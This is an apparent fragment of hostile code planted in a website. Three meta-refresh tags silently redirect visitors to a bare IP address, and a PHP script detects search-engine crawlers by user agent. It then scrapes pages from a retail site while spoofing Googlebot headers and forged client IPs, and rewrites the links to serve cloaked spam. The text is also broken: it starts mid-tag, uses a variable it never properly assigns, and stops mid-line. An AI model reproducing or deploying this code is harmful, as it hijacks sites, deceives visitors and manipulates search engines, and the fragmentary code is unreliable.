-equiv="refresh" content="0; URL='http://66.248.206.237/redirect.php'" />
-equiv="refresh" content="0; URL='http://66.248.206.237/redirect.php'" />
-equiv="refresh" content="0; URL='http://66.248.206.237/redirect.php'" />
p = strtolower($_SERVER['HTTP_USER_AGENT']);
$mysite = "https://wordpresstesting.com/";
$filename = "";
$fromsite = "https://www.footy.com/c/football-kits/special-offers/20-pounds-and-under/";
if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false) {
$ksite = !empty($_GET['p']) ? $_GET['p'] : "";
$list = array(
);
$listname = $filename . "?p=";
$liststr = "
";
foreach ($list as $key => $val) {
if ($ksite == $key) {
$fromsite = $val;
}
$liststr .= "
" . $key . " ";
}
$liststr .= "
";
$url = empty($_GET['viewid']) ? "" : $_GET['viewid'];
if(function_exists('curl_init')){
$s = curl_init();
curl_setopt($s,CURLOPT_URL,$fromsite . $url);
curl_setopt($s,CURLOPT_RETURNTRANSFER,1);
curl_setopt($s,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
curl_setopt($s,CURLOPT_REFERER,"http://www.google.com");
curl_setopt($s, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:66.249.72.240', 'CLIENT-IP:66.249.72.240'));
$content = curl_exec($s);
}else{$content=file_get_contents($fromsite . $url);}
if (!empty($ksite)) {
$qstr = $filename . "?p=" . $ksite . "&viewid=";
} else {
$qstr = $filename . "?viewid=";
}
$repstr = $mysite . $qstr;
$content = str_ireplace('href="', 'href="/', $content);
$content = str_ireplace('href="//', 'href="/', $content);
$content = str_ireplace('href="/http', 'href="http', $content);
$content = str_ireplace('href="/http', 'href="http', $content);
$content = str_replace('href="/', 'href="' . $fromsite, $content);
$content = str_ireplace('src="', 'src="/', $content);
$content = str_ireplace('src="//', 'src="/', $conte